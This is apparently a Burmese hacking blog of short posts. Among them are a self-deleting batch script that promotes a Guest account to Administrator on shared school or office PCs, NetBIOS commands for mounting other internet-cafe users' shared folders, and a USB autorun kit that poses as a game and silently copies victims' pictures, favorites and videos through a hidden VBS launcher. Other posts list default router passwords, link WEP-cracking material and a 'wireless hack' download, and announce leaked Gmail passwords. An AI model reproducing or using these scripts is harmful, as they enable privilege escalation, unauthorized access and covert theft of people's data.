ဂျီမေး အကောင့်များ၏ password များကို (Blink Hacker Group)မှ

ဂျီမေး အကောင့်များ၏ password များကို (Blink Hacker Group)မှ

ဂျီမေး အကောင့်များ၏ password များကို BHG အဖွဲ့ဝင်တဦးဖြစ်သော H4rdcore H4cker မှရရှိထား ပါသည်။ မိမိတို့ အကောင့်များ လုံခြုံစေရန် H4rdcore H4cker သို့ဆက်သွယ် အကြံတောင်းခံနိုင်ပါသည်။ အချိန်မရွေး အကောင့်များကို ဖျက်ပစ် နိုင်သည့် အခြေနေတွင် မည်သို့ ကာကွယ်ရန်မှာ မေးသင့်သော မေးခွန်း ဖြစ်ပါသည်။
Note : H4rdcore H4cker မှာ Black Hat Hacker တယောက်မဟုတ်ပါ။ မိမိတို့ Gmail များ   ပါဝင်မှုရှိ မရှိ ကို ဒီမှာ ကြည့်နိုင်ပါတယ်။ မြန်မာနိုင်ငံမှ White Hat Hacker အမည်ခံ ကြောင်သူ တော်များ နမူနာယူရန် တင်ပေးထားခြင်းဖြစ်ပါသည်။
Cheers Hard Core! :D

1:04 PM | Posted in | Read More »

Hacking လူငယ် နှင့် အနာဂတ်တွင် အရေးပါလာမည့် Security

Hacking လူငယ် နှင့် အနာဂတ်တွင် အရေးပါလာမည့် Security

မနေ့က ကျွန်တော့် အကောင့် အခိုးခံလိုက်ရပါတယ် သိပ်ထူးထူးခြားခြား နည်းပညာတော့ မဟုတ်ပါဘူး Phishing နဲ့ပါပဲ ဒါပေမယ့် ကျွန်တော့်အကောင့်ကို Crack သွားတဲ့ လူက အဲ့ဒီ့ နည်းကို Phishing မှန်းတောင် မသိပါဘူး Webpage အတု တစ်ခုသုံးပြီး Crack တဲ့နည်းကို သူ့အတွက်တော့ ဘယ်လိုနာမည် ပေးထားလဲ မသိဘူး ပြီးတော့ ကျွန်တော့်ကို မေးသွားသေးပါတယ် Phishing ဆိုတာ ဘာလဲ သိလား ဟေ့ကောင် တဲ့ Hacking ကို မတောက်တစ်ခေါက်တတ်ပြီး ဘလော့မရေးနဲ့ တဲ့ ခက်တော့တာပဲဗျာ ကျွန်တော့် ဘလော့ဂ်ကို Hacking Blog များမှတ်နေလားမသိဘူး ဒီနေ့ ထပ်ကြိမ်းသွားပါတယ် ကျွန်တော့်အကောင့်တွေ အားလုံးကို Crack မယ် တဲ့ ပြီးတော့ ပြောပါသေးတယ် မင်းဆိုဒ်ကို DDOS စာ ကျွေးမယ်ဆိုပဲ (DDOS ရဲ့ အရှည်ကောက် DDOS ဘယ် နှစ်မျိုးရှိသလဲ ဆိုတာ သိလားလို့ မေးလိုက်ချင်တယ် ဒါဆို ကျွန်တော်သဘောပေါက်ပြီး BHG ကပေးတဲ့ Logic tool ကိုသုံးတော့မယ် Logic ဟာ ၀င်းဒိုးအတွက် အဆင်ပြေတယ်ဆိုပေမယ့် Open Source တွေအတွက်ဆို ဒီ့ထက် ကောင်းတဲ့ Tool တွေ တွေ့ ဖူးပါတယ် BHG ကိုလည်း ဘာမှတော့ မပြောလိုတော့ ဘူး ဒီလို BHG ချပေးလိုက်တဲ့ Tool လေးတစ်ခုကိုသိတာနဲ့တင် ကျွန်တော်တို့ နိုင်ငံက လူတွေက ရမ်းချင် နေပြီ ဒါဆို ဒီထက်ဆိုးတဲ့ Tool တွေ တွေ့ သွားရင် ဘာဖြစ်မလဲ ကျွန်တော်တို့ နိုင်ငံ က လူတွေနဲ့ ရော တန်လား BHG ကိုစဉ်းစားစေချင်တယ် ) ဒီလောက်ဆို ကျွန်တော် သဘောပေါက်ပြီ ကျွန်တော့်ကို Crack တဲ့ လူ Programming တစ်ခုမှ မတတ်ဘူး ဒီလိုပြောရင် ကျွန်တော်က သူ့ကို မုန်းလို့ လို့ ပြောကြမယ် ကျွန်တော် ပြောချင်တာ သူ့ကို မဟုတ်ဘူး ကျွန်တော့် ဘလော့ဂ်ကိစ္စ….။

မနေ့က အကိုတစ်ယောက်ရဲ့ ဘလော့မှာ စာတစ်ကြောင်းတွေ့ လိုက်ပါတယ် I’m neither a hacker nor cracker,I’m Blogger !!!! အဲ့ဒီလို ပါပဲ ကျွန်တော့်ကို ကျွန်တော် Hacker ပါလို့ ဘလော့မှာ တစ်ခါမှ မရေးဖူးဘူး ဒါပေမယ့် Hacking ကို ရူးသွပ်တယ်လို့တော့ ရေးထားတယ် Cracking မဟုတ်ဖူးနော် Hacking ……!! Security ကို ဖြစ်စေချင်တာ ဒါပေမယ့် Blog မှာ Black Hacking တွေပါလာတယ် ကျွန်တော့် ဘလော့ကို လာတဲ့လူတွေက Hacking ကို ဖတ်ချင်တဲ့ လူငယ်တွေပဲဖြစ်နေတယ် Hacker နဲ့ Cracker ဆိုတာ နည်းပညာပိုင်းဆိုင်ရာမှာ အတူတူပါပဲ Cracker ရဲ့ နည်းတွေကိုလည်းHacker တွေသုံးရတာပဲ ဒါပေမယ့် စည်းလေး တစ်ခုပဲ ခြားထားတယ် အဲ့ဒီ့ စည်းက ကိုယ်ချင်းစာတရားးးး ဟုတ်ပါတယ် ဒီစည်းရဲ့  အတွင်းမှာ ရှိတဲ့လူတွေက Hacker ဒီစည်း အပြင်မှာရှိရင် Cracker ဒါလေးပဲ ရှင်းရှင်းလေး ဒါပေမယ့် လူငယ်တွေက Black ပဲ သူတို့ကိုယ်သူတို့ Black ဆိုပြီး ဂုဏ်ယူတဲ့ လူတွေက တစ်ပုံကြီး……။ကျွန်တော် ဦးတည်တာက Security လူငယ်တွေ ကျွန်တော့်ဘလော့ကို လာတဲ့အကြောင်းက Crack ဖို့ ..။ BHG က အကို တစ်ယောက်က ညဉ်းရှာတယ်ဗျ Gtalk ဖွင့်တိုင်း ဘယ်လို Hack ရမလဲပဲ လာအမေးခံရတယ်တဲ့ သူကလည်း အဲ့လို မေးရင် ကျွန်တော့် ဘလော့ကို လမ်းညွှန်လိုက်ဟန်တူပါတယ် လူတစ်ယောက်က ကျွန်တော့် အကောင့်ကို လာအပ်တယ် ဘလော့ဂ်ကို ကြိုက်တယ်တဲ့ ဒါပေမယ့် BHG က ဘဲကြီးတွေ နဲ့ သိလားတဲ့ ကျွန်တော်ကလည်း Gtalk မှာ တွေ့ ဖူးလို့ ဟုတ် လို့ ဖြေလိုက်တယ် အဲ့ဒီမှာပဲ ကိုယ်တော်ချောက ခင်ဗျားက အဆက်အသွယ်ကောင်းတယ်နော် တဲ့ ပထမတော့ ကျွန်တော် ကြောင်သွားတယ်ဗျ ပြီးတော့ ဆက်သေးတယ် သူက တစ်ကိုယ်တော် တဲ့ ဟောဗျာ သူပြောမှပဲ Hacking အတွက် ကျွန်တော့်ကို BHG က သင်ပေး သလို လို….။ BHG က အကိုတွေကတော့ အားပေးတယ် ကျွန်တော့်ဘလော့ဂ်ကို ကြိုက်တယ်တဲ့ Hacking ကို ဗမာလို ဖတ်ရလို့ အရသာ ရှိပါတယ်တဲ့ အဲ့ဒီလိုပြောတော့ အားရှိတာပေါ့ တကယ်ပါ ခုခေတ်မှာ အဘိုးကြီးလည်းဟက် အဘွားကြီးလည်း ဟက်ပဲ ဟက်ဆိုတာလည်း ဘာမှန်းမသိ Programming ဘာမှန်းမသိ Script ဘာမှန်းမသိဘဲ Hack မယ် တကဲကဲ ဆိုတဲ့ လူတွေက များနေတော့ စိတ်ပျက်လာပါတယ် နောက်ပိုင်းမှာ Hacking တင်ပေးဖို့ကို အတော်ကြီးစဉ်းစားရတော့မယ် ပြဿနာတွေအများကြီှးရှိနေပြီ သတိ တစ်ချက်လွတ်သွားတာနဲ့ Crack တာခံလိုက်ရတယ် သိပ်မကြာခင်က တစ်နေရာမှာ ဖတ်လိုက်ရတယ် အင်တာနက်ပေါ်မှာ ဖုန်းခပေးဆောင်နိုင်တော့မယ်တဲ့ ဒါ အစပါ နောက်ဆို ဘဏ်အကောင့်တွေနဲ့ပဲ ဇာတ်လမ်းသွားတော့မယ် ပိုက်ဆံအများကြီး မကိုင်ရတော့ဘူး ဒီလို တိုးတက်လာတာနဲ့ အမျှ Securityက ပိုပို လို လာပြီ Without you,Anyone cannot Crack ပါ ဒီတော့ပိုပြီးအရေးပါလာတဲ့ Security အတွက် Hacking ကိုပိုပြီးနားလည်တဲ့လူတွေ လိုလာပြီ Security admin တွေဖြစ်ဖို့ လူငယ်တွေလိုလာတော့မယ် ဒါကို ကျွန်တော်တို့ နိုင်ငံက လူငယ်တွေ စိတ်မ၀င်စားဘူး သူတို့စိတ်ဝင်စားတာ ရုပ်ရှင်ထဲကလို ဟက်ကာတွေ ဘာကြောင့်လဲဆိုတာတော့ တွေးလို့ကို မရဘူး တကယ်လို့ နောက်ဆိုရင် ကျွန်တော့်အကောင့်က ပက်စ်ဝက်တွေလိုချင်ရင် Crack မနေနဲ့  ကျွန်တော်ပေးမယ် ပြီးတော့ ထပ်ပြောမယ် I’m a blogger ဘာကောင်ကြီးမှ မဟုတ်ဘူး သိပ်အထင်မကြီးကြနဲ့ နောက်ပိုင်းကို Hacking Post တွေ ဆက်တင်နေဦးမှာပဲ Security အတွက် ပဲနော် ဘာအတွက်မှမဟုတ်ဘူး ပြီးတော့ ကျွန်တော့်ဆိုဒ်ကို တိုက်မယ်ဆိုတဲ့ လူကို မေးချင်တယ် ကျွန်တော့်လို ဆိုဒ်မျိုး မြန်မာဘလော့တွေမှာ တွေ့ ဖူးလားလို့ Hacking စစ်စစ်ကို စိတ်ဝင်စားတဲ့လူငယ်တွေ Ethical Hacker ဖြစ်ချင်တဲ့လူတွေအတွက် မြန်မာလိုရေးတဲ့ Hacking ကိုဘယ်မှာဖတ်ရလဲ ကျွန်တော် မေးချင်တယ် ကျွန်တော့်ဘလော့က ဒါဆို လူတစ်ယောက်အတွက်မှ အကျိုးမရှိတော့ဘူးလား နည်းနည်း လောက်အကြံပေးကြပါဦး ကျွန်တော့်ဘလော့ကို ခင်ဗျားတို့ မြင်တဲ့ အမြင်လေးလည်း လုပ်ကြပါဦး ဗျာ……….။

Credit: Posted by Kaung Khant Min Tun

10:25 AM | Posted in | Read More »

Guest အကောင့်ကနေ Admin ကို hack နည်း

Guest အကောင့်ကနေ Admin ကို hack နည်း

ကျွန်တော်သူငယ်ချင်းတွေအတွက် အဆင်ပြေမည့် နည်းလမ်းလေး တစ်ခုဖြစ်ပါတယ်။ ကွန်ပျူတာကို ကျွန်တော်တို့ ကျောင်းတွေ ရုံးတွေ စာသင်ခန်းတွေမှာ user တွေ တစ်ခုချင်ဆီ သတ်မှတ်ပြီး သုံးရပါတယ်။ ဥပမာ Administrator ကိုတော့ ဆရာက သုံးပြီး Guest ကိုတော့ ကျောင်းသားကို ပေးသုံးတယ်ဆိုပါစို့။ အဲဒီလို မိမိက Guest သုံးရတာ ဖြစ်တဲ့အတွက် အကန့်အသန့် ရှိပါတယ်။ ဥပမာ internet သုံးချင်တာ တောင် သုံးလို့ မရဘူးဖြစ်နေပါတယ်။ ဒါကြောင့် မိမိက Guest သုံးနေရလို့ Administrator လို လွတ်လပ်စွာ သုံးခွင့်မရလို့ စိတ်ညစ်နေတဲ့ သူငယ်ချင်းများအတွက် အောက်ပါအတိုင်း bat ဖိုင်တစ်ခု တည်ဆောက်ပြီး Administrator တစ်ယောက်ကဲ့သို့ Guest ကနေ အသုံးပြုလို့ရအောင် စမ်းသပ်ကြည့်နိုင်ပါတယ်။ အဆင်ပြေမှာပါ။ နောက်အသုံးဝင်နိုင်သေးတာက Administrator Password မေ့သွားရင်လည် ဒီနည်းနဲ့ အသုံးပြုနိုင်ပါတယ်။
1. Start >> Run >> notepad လို့ရိုက်ပြီး Enter ခေါက်လိုက်ပါ။ ကျလာတဲ့ notepad ထဲကို အောက်က code တွေကို copy လုပ်ပြီးထည့်လိုက်ပါ။


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0


ပြီးရင် Guest2admin.bat လို့ Save လိုက်ပါ.။

2.Guest2admin.bat ဖိုင်ကို Double click လုပ်ပြီး ဖွင့်လိုက်ပါ။ ဒါဆိုရင် အဆင်ပြေပါပြီး နောက်ပိုင်း ဖြစ်တာကိုတော့ ကိုယ်တိုင်းစမ်းကြည့် လက်တွေ့သိပါမည်။:D


ကျေးဇူးတင်ပါတယ် အားလုံးအဆင်ပြေပါစေ

3:16 PM | Posted in | Read More »

အင်တာနက်ဆိုင်တစ်ဆိုင်လုံးကို hack ဇို့

အင်တာနက်ဆိုင်တစ်ဆိုင်လုံးကို hack ဇို့

သင်ယခု အင်တာနက်ဆိုင်မှာသုံးနေမယ်ဆိုရင်တော့ ဒီနည်းကိုစမ်းသပ်ဖို့ အဆင်ပြေပါတယ်။ Netbios command တွေကိုအသုံးပြုပြီး ဆိုင်တစ်ဆိုင်လုံးက data တွေကို hack ဖို့ ဖြစ်ပါတယ်။ ယခု သင့်စက်နဲ့ ချိတ် ဆက်နေသော ကွန်ပျူတာဘယ်နှလုံးရှိသလဲလို့ အရင်ဆုံးစမ်းသပ်ကြရပါမယ်။

Start -> Run -> cmd

net view လို့ ရိုက်ထည့်လိုက်ပါ။ သင့် ကွန်ပျူတာနဲ့ ချိတ်ဆက်နေသော ကွန်ပျူတာနာမည်များတန်းစီပေါ်လာ သည်ကိုတွေ့ ရပါမယ်။ထို အထဲကမှသင်ဟက်ချင်သောကွန်ပျူတာနာမည်ကိုမှတ်လိုက်ပါ။ ကျွန်တော့စက်နဲ့ ချိတ်ထားတာကတော့. PC-3 ဆိုတဲ့ စက်တစ်လုံးရှိပါတယ်။

net view //PC-3

လို့ရိုက်ထည့်လိုက်ပါ။ယခုလိုရိုက်ထည့်လိုက်လျှင် PC-3 ထဲတွင်ရှိသော data file name ကိုတွေ့ ရပါမယ်။ ကျွန်တော့် ဆီမှာ ကတော့Documents လို့ တွေ့ ရှိရပါတယ်။

net use F: //PC-3/Documents

လို့ ရိုက်လိုက်ပါ။ဆိုလိုသည်မှာ PC-3 ထဲမှ Data ကို သင့်ကွန်ပျူတာထဲတွင် F drive အနေဖြင့်အသုံးပြု လိုက်ခြင်းဖြစ်သည်။ F ကိုတစ်ခြားနေရာတွင်သုံးထားလျှင် မိမိကြိုက်နှစ်သက်ရာနာမည်ပေးနိုင်ပါ သည်။

အားလုံးပြီးပါက My Computer ကိုဖွင့်ကြည့်လိုက်ပါ။
Dirve F တွင်သင့် hack လိုက်သောကွန်ပျူတာ၏ data file များကိုတွေ့ ရှိရပါမယ်။ :)

4:24 PM | Posted in | Read More »

ကွန်ပျူတာ password ကို ချိန်းလို့မရအောင်

ကွန်ပျူတာ password ကို ချိန်းလို့မရအောင်
  1. window+R နှိပ်ပြီRun  box ခေါ်လိုက်ပါ။
  2.  gpedit.msc ကိုရိုက်ထည့်ပြီ ok(or)Enter နှိပ်လိုက်ပါ။
  3.  Group Policy Object Editor ဆိုတဲ့ box လေးကျလာပါလိမ့်မယ်။
  4.  အဲဒီ box ရဲ့ Local Computer Policy အောက်က User  Configuration ကိုသွားလိုက်ပါ။
  5.  User Configuration ရဲ့အောက်မှ Administrative Template ဆိုတာလေးကို  double click  ပေးပြီသူ့ရဲ့အောက်ကsystem ဆိုတာလေးကို double click ထပ်ပေးလိုက်ပါ။
  6.  ပြီးရင်တော့ ညာဘက်မှာရှိနေတဲ့setting ရဲ့အောက်က Ctrl +Alt +Del ဆိုတာလေးကိုdouble click ပေးပြီဝင်လိုက်ပါ။
  7.  အပေါ်ဆုံးမှာမြင်နေရတဲ့ Remove change password ကိုdouble click လုပ်ပြီး ၀င်လိုက်ပါ။
  8.  အဲဒီမှာ Remove Change Password  Properties ဆိုတဲ့ box လေး ထပ်ပေါ်လာပါလိမ့်မယ်။
  9.  အဲဒီ box ရဲ့ setting ထဲက Enable ဆိုတာလေးကိုအမှန်ခြစ်လေးပေးပြီး apply , ok ပေးလိုက်ပါ။
 ဒီလိုလေးလုပ်လိုက်ရင်တော့ ကိုယ့်ကွန်ပျူတာ password ကို ဘယ်သူမှချိန်းလို့ရမှာမဟုတ်တော့ပါဘူး။

10:51 AM | Posted in | Read More »

Hacker ဖြစ်လိုသူတွေ အတွက် နာမည်ကြီး Hacker Site တွေ

Hacker ဖြစ်လိုသူတွေ အတွက် နာမည်ကြီး Hacker Site တွေ


www.hackforum.net
Hacking လောကမှာ ကလေးက အစ ခွေးအဆုံးသိတဲ့ ဖိုရမ်ပါ စည်းကမ်းအရမ်းတင်းကြပ်တာက ခက်တယ်

www.defcon.org
နိုင်ငံတကာ ဟက်ကာတွေစုနေတဲ့ အဖွဲ့ အစည်းဖြစ်ပြီး အထက်ကထက် မညံ့ဘူးလို့တော့ ထင်တယ်ဗျ
နောက်ဆိုဒ်တွေကိုတော့ အသေအချာမရေးတော့ပါဘူး သွားကြည့်ပါတော့

www.hackthissite.org
www.hackaday.com
www.mrcracker.com
www.asianhackers.com
www.elite-hackers.com
www.hacktest.net တို့ပဲဖြစ်ပါတယ် အရမ်းကြိုက်တဲ့ဆိုဒ်ကလေးတွေကိုပဲ စုပေးလိုက်တာဖြစ်လို့ နည်းနေရင် ခွင့်လွှတ်ပါ ထပ်လိုချင်ရင်တော့ Google ကိုသာ အားကိုးတော့ဗျို့ 

8:12 PM | Posted in | Read More »

Admin Router Passwords(Defaulf)

Admin router passwords (Default Password List)

Link = Default Admin Password List

Vendor Model Version Access Type Username Password Privileges







Name             = Linksys
Model             = WAG54G
Username       = admin
Password        = admin

2:04 PM | Posted in | Read More »

WEP Hacking Tutorials and Resources

WEP Hacking Tutorials and Resources:
  1. WEP can be cracked in 10 minutes easily.
  2. Related hacking project: War Driving Tips, Tricks, and Software
  3. Learn to Hack WEP using Mac or Linux
  4. WEP hacking video tutorial.
  5. If all else fails, try the default admin router passwords.
Wired Equivalent Privacy (WEP) is often mistakenly thought of as a protocol designed to 100% protect wireless traffic, when this is not the case. WEP is easy to crack and shouldn’t be used.

1:58 PM | Posted in | Read More »

Wifi Hacking tools

Wifi Hacking tools

လေ့လာလို့ရအောင် တင်ပေးလိုက်တာပါ။ တစ်ခြား ဘာရည်ရွယ်ချက်မှ မပါပါဘူး။ရမရလေ့လာကြပေါ့။ အဆင်ပြေကြပါစေဗျာ ... 
ကျွန်တော်ကတော့ သိပ်ဝါသနာမပါဘူး . ကိုယ်ရုံးခန်းနဲ့ ကိုယ်ဆိုတော့ ကိုယ် password  ကိုယ်တိုင် သိနေ တော့ မလိုဘူးလေ။ password က ကို့လက်ထဲမှာဆိုတော့ သိပ်စိတ်မပါဘူး . လိုက်စမ်းရမှာ...။

ဒါက အခုနောက်ပေါ် Wireless Hack Tools (2009) software ပါ .. စမ်းချင်ရင် Download လုပ်လိုက်ပါ ကြိုပြောထားပါတယ်။

Download Wireless Hack Tools (2009) ( ကိုညီနေမင်း တင်ထားသော)

1:53 PM | Posted in | Read More »

Copy & Paste , Ctrl + C / V ကိုသတိထားရန်

Copy & Paste , Ctrl + C / V ကိုသတိထားရန်

ကျွန်တော်တို့တွေ Ctrl + C/ Copy လုပ်တယ် ပြီးရင် past လုပ်ပါတယ်။ ဒီတော့ ဒီလိုလုပ်လိုက်တဲ့ဟာ အားလုံးကို clipboard မှာယာယီသိမ်းပေးသွားတယ်။ ဒါကို အင်တာနက်ကနေပြီးတော့ အလွယ်တကွယ် Javascripts & ASP တွေနဲ့ ပေါင်းပြီး ကြည့်လို့ရပါတယ်။

ဥပမာအနေနဲ့ ကြည့်မယ်ဆိုရင်
1) Copy any text by ctrl+c
2) Click the Link: www.friendlycanadian.com/applications/clipboard.htm
3) ဒါဆိုရင် မိမိ copy ကူးထားလိုက်တဲ့ စာသားကို ၄င်း webpage မှာ မြင်ရပါလိမ့်မယ်။

ဒါကြောင့် မိမိရဲ့ password, creditcard numbers, pin စသည်တို့ကို မိမိအင်တာနက် သုံးနေစဉ် copy မလုပ်ပါနဲ့။ မိမိရဲ့ clipboard မှ အလွယ်တကူ ခိုးယူနိုင်တယ်ဆိုတာ သိစေချင်လို့ပါ။
ဒါကလည်း အခုအချိန်မှာ firefox မှ လွဲပြီး အခြား browser တွေမှာ ဖြစ်တာများပါတယ်။ Browser တိုင်းမှာ လုံခြုံရေးဆိုင်ရာ script တွေကို access လုပ်မယ် မလုပ်ဘူးဆိုတာ Inform လုပ်ပေမဲ့ user တိုင်းက message ကို တော်တော်နဲ့ မဖတ်တတ်ပါဘူး။ yes or no ဆိုရင် " yes" လိုက်တာပဲ။ allow or disallow ဆိုရင် "allow" လိုက်တာပဲ။

ဒါကိုကာကွယ်ဖို့ IE မှာဆိုရင်
အောက်ပါအပိုင်း setting လုပ်မယ်။

1. Go to internet options->security
2. Press custom level
3. In the security settings, select disable under Allow paste operations via script.
ဒါဆိုရင် လုံခြုံသွားပါပြီ။







http://www.lannthit.com မှ ကူးယူဖော်ပြပါသည်။

2:37 PM | Posted in | Read More »

User တွေရဲ့ Data တွေကို USB Flash Drive နဲ့ ခိုးယူမယ်

User တွေရဲ့ Data တွေကို USB Flash Drive နဲ့ ခိုးယူမယ်

သူများကွန်ပျူတာထဲက အချက်အလက်တွေကို USB flash Drive လေးထိုးလိုက်တာနဲ့ ယူလို့ရ တယ်ဆိုတဲ့ နည်းလေးပါ။ ကိုယ်ကလည်းသူများ Computer တွေမှာ သုံးရင် USB flash Drive တပ်ထားလည်း အရင် စစ်ဆေးသင့် ပါတယ်။ မှတ်သား လေ့လာဖို့ပါ ခင်ဗျား။

ပထမဦးဆုံး 8GB ရှိတဲ့ USB flash Drive တစ်ခုကိုယူရပါမယ်။ ပြီးရင်တော့ အဲဒီထဲမှာ ဘာမှမရှိအောင် ရှင်းထားပေးရပါ့မယ်။ ဆိုလိုတာက Format ချလိုက်ပေါ့ဗျာ။

၁) အနေနဲ့ အဲဒီ USB Flash Drive ထဲမှာ Folder တစ်ခုကိုတည်ဆောက်ရပါ့မယ် နာမည်ကိုတော့ All လို့အမည်ပေးထားလိုက်ပါ။

၂) ကတော့ အောက်ပါကုဒ်လေးတွေကို ကူးယူပြီး File.bat ဆိုပြီးနာမည်ပေးလိုက်ပါ။ ပြီးရင်တော့ စောစော က USB flash Drive ထဲမှာသိမ်းလိုက်ပါ။ ပြီးရင်....


@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls



၃) အခုဖော်ပြမဲ့ ကုဒ်လေးတွေကိုတော့ Launch.bat လို့အမည်ပေးပြီး Drive ထဲမှာသိမ်းထားလိုက်ပါဗျာ

wscript.exe \invisible.vbs file.bat


၎) အနေနဲ့ကတော့ ..ဒီကုဒ်လေးတွေကို invisible.vbs လို့မည်ပေးပြီးတော့ သိမ်းလိုက်ပါဗျာ..
ကဲအားလုံးပြီးသွားရင်တော့ဗျာ

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False


နောက်ထပ်သူတို့ ကို Run ဖို့က Autorun.inf ဆိုတဲ့ဖိုင်လေးလိုလာပါပြီး
Autorun ဖိုင်ကိုဒီလိုလေးရေးမယ်ဗျာ….

[autorun]
icon=drive.icon
open=launch.bat
action=Click ok to Run game for Windows
shell\open\command=launch.bat



ဒီ icon ဆိုတဲ့နေရာမှာ မိမိ ထည့်မည် icon လေးရဲ့နာမည်လေးပေးရမှာပါ ဥပမာ ကို့ Icon လေးရဲ့ နာမည်က USBFlashCardWithCardReader2 ဆိုရင်တော့ USBFlashCardWithCardReader2.icon လို့ ဖိုင်နာမည်ပေးရမှာပါ။ ဒီလောက်ဆို သဘောပေါက်မယ်လို့ ထင်ပါတယ်...
ဖိုင်တွေအားလုံးကို Save လုပ်တဲ့နေရာမှာ File type ကို All ထားပေးရမှာဖြစ်ပါတယ်။

ကဲအားလုံးပြီးသွားရင်တော့ My Computer ထဲက Drive ထဲမှာ လူကြီးမင်ရဲ့ Flash Drive လေးကို Icon လှလှလေးနဲ့တွေ့နေရပြီး...

စမ်းသပ်လို့ရပါပြီခင်မျာ..ဖိုင်တွေကို All Folder ထဲမှာ သူအလိုလျှောက် ဆွဲထည့်ထားပါလိမ့်မယ်..

2:22 PM | Posted in | Read More »